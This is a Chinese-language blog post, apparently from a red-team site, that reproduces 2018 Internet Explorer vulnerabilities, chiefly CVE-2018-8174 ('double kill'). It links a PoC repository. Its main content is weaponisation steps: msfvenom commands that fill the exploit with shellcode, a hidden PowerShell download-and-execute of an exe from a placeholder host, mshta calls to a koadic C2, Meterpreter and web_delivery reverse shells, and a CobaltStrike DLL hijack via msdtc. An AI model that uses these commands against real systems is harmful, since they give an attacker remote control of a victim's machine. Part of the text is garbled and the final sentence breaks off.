2018 年 ie 漏洞复现合集

红蓝对抗 2019-11-10

对 2018 年几个IE漏洞的复现与说明,之前复现的时候在仓库的文档中简单的说明了一下,以下是这几个漏洞的复现报告与一些基本的利用方法,这些漏洞或多或少都出现在 APT 攻击中,特别是 CVE-2018-8174 又称"双杀"漏洞而 8373 又被 Darkhotel 组织利用

img

以上对这三个漏洞进行复现, Poc 下载地址:

https://github.com/B1eed/VulRec

CVE-2018-8174

首先CVE-8174-8174的原 PoC 中定义了一个Getshellcode函数,此函数为漏洞利用的核心函数,其功能使用JS Unescape函数对escape函数编码的字符串进行解码。

其中解码的内容为 Shellcode

img

利用方法为 Msf 生成 shellcode 填充或使用自己的 shellcode 填充

Msf 命令如下:

msfvenom -p windows/exec cmd=calc.exe -f js_le exitfunc=thread -a x86

生成弹出计算器的 shellcode 然后填充到 Getshellcode 函数中

填充完后使用IE打开,成功弹出计算器。

img

则可使用以下几种方式

1、koadic 远控 mshta 功能反弹 shell

msfvenom -p windows/exec cmd="mshta koadic生成的地址" -f js_le exitfunc=thread

x64 位的:

msfvenom -p windows/x64/exec cmd="mshta koadic生成的地址" -f js_le exitfunc=thread

2、Powershell 下载执行

msfvenom -p windows/exec cmd="powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://xxx.xx.com/1.exe','C:WindowsTasks23.exe');start-process " -f js_le exitfunc=thread

3、使用MSF web_delivery 模块反弹(本质还是 Powershell)

img

4、当然还可以生成 Meterperter 的 shellcode 填充

建议使用 stage payload,stage 可以理解为将原来的全部攻击代码进行拆分,stage 先进行第一阶段的利用进行目标后再把剩余的 shellcode 加载过来, stage 的 payload 相对于原来较小

5、自己提取 shellcode 然后进行填充测试

填充自己的下载执行 sc 成功下载执行木马

img

特别的利用方法

可以使用msdtc的 Dll 劫持漏洞,用CobaltStrike生成恶意 Dll,然后下载到C:\windows\system32 目录下 DLL 名称为oci.dll,使用msdtc


本文由 信安之路 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

楼主残忍的关闭了评论